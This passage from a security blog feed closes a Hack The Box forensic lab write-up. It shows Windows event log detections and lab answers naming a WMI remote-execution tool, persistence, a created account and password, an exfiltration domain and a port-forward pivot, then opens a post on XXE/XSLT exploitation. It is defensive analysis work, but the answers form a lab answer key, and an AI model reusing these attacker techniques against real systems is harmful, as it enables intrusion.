
&#9474; 2025-08-25 19:57:02 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 5449      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x1d2e6e'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-25 19:57:07 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 5471      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 7                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x326db7'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-25 20:03:10 &#9474; &#8227; Powershell File and Directory     &#9474; 1     &#9474; Microsoft-Windows-PowerShell   &#9474; 4104     &#9474; 458       &#9474; Heisen-9-WS-6   &#9474; MessageNumber: 1                 &#9474;
&#9474;                     &#9474; Discovery                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptBlockText: "# Copyright    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; &#169; 2008, Microsoft Corporation.   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;  All rights reserved.\r\n\r\n\   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; r\n#Common utility functions\r   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; \nImport-LocalizedData -Bindin   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; gVariable localizationString -   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; FileName CL_LocalizationData\r   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; \n\r\n# Function to get user t   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; roubleshooting history\r\nfunc   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; tion Get-UserTSHistoryPath {\r   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; \n  return \"${env:localappdat   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; a}\\diagnostics\"\r\n}\r\n\r\n   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; # Function to get admin troubl   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; eshooting history\r\nfunction    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Get-AdminTSHistoryPath {\r\n     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; return \"${env:localappdata}\\   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ...                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; (use --full to show all content) &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptBlockId: b912e694-25fe-4   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6a8-bf50-57249c228c7c            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; MessageTotal: 1                  &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Path: C:\Windows\TEMP\SDIAG_c0   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ddb614-4bfa-495e-b3ca-10f09ea7   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; fdbf\CL_Utility.ps1              &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-25 20:04:18 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 5631      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 7                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x401462'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-25 20:04:20 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 5634      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x31ea0d'        &#9474;
&#9492;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9496;

[+] 136 Detections found on 135 documents</code></pre></div><p>. . .[SOON]. . .</p><p>I believe that&#8217;s basically all of it and our review supposed to be enough for analysis report:</p><ul><li><p>What was the first (non cd) command executed by the attacker on the host?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">systeminfo</code></pre></div><ul><li><p>Which parent process (full path) spawned the attacker&#8217;s commands?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">C:\Windows\System32\wbem\WmiPrvSE.exe</code></pre></div><ul><li><p>Which remote-execution tool was most likely used for the attack?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">wmiexec.py</code></pre></div><ul><li><p>What was the attacker&#8217;s IP address?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">10.129.242.110</code></pre></div><ul><li><p>The attacker established multiple persistence mechanisms. What is set as the name of the earliest one created?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">SysHelper Update</code></pre></div><ul><li><p>Identify the script executed by the persistence mechanism. </p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">C:\Users\Werni\AppData\Local\JM.ps1</code></pre></div><ul><li><p>What local account did the attacker create?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">svc_netupd</code></pre></div><ul><li><p>What domain name did the attacker use for credential exfiltration?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">NapoleonsBlackPearl.htb</code></pre></div><ul><li><p>What password did the attacker's script generate for the newly created user?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Watson_20250824160509</code></pre></div><ul><li><p>What was the IP address of the internal system the attacker pivoted to?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">192.168.1.101</code></pre></div><ul><li><p>Which TCP port on the victim was forwarded to enable the pivot?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">9999</code></pre></div><ul><li><p>What is the full registry path that stores persistent IPv4&#8594;IPv4 TCP listener-to-target mappings?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp</code></pre></div><ul><li><p>What is the MITRE ATT&amp;CK ID associated with the previous technique used by the attacker to pivot to the internal system?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">T1090.001</code></pre></div><ul><li><p>Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this?</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;d4048a3c-ebea-44dd-9f53-ffc211d8f0a6&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uJKa!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uJKa!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png 424w, https://substackcdn.com/image/fetch/$s_!uJKa!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png 848w, https://substackcdn.com/image/fetch/$s_!uJKa!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png 1272w, https://substackcdn.com/image/fetch/$s_!uJKa!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uJKa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png" width="880" height="469" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:469,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:195702,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189512062?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!uJKa!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png 424w, https://substackcdn.com/image/fetch/$s_!uJKa!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png 848w, https://substackcdn.com/image/fetch/$s_!uJKa!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png 1272w, https://substackcdn.com/image/fetch/$s_!uJKa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24d73328-2c3c-441e-aeeb-aae85e9cf0af_880x469.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><a href="https://labs.hackthebox.com/achievement/sherlock/2489228/1072">labs.hackthebox.com/achievement/sherlock/2489228/1072</a></p></li></ul><p>Happy Defending, Thanks HackTheBox!!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Conversor - Linux (Easy)]]></title><description><![CDATA[Attacking WebApp that's vulnerable to XXE and XSLT payloads to gain reverse-shell, enumerate SQLite3 database do get User credential. PrivEsc to root via exploiting binary app on SBIN,set UID to root.]]></description><link>https://byt3n33dl3.substack.com/p/htb-conversor-linux-easy</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-conversor-linux-easy</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Sat, 21 Mar 2026 13:07:32 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!50Um!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!50Um!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!50Um!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png 424w, https://substackcdn.com/image/fetch/$s_!50Um!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png 848w, https://substackcdn.com/image/fetch/$s_!50Um!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png 1272w, 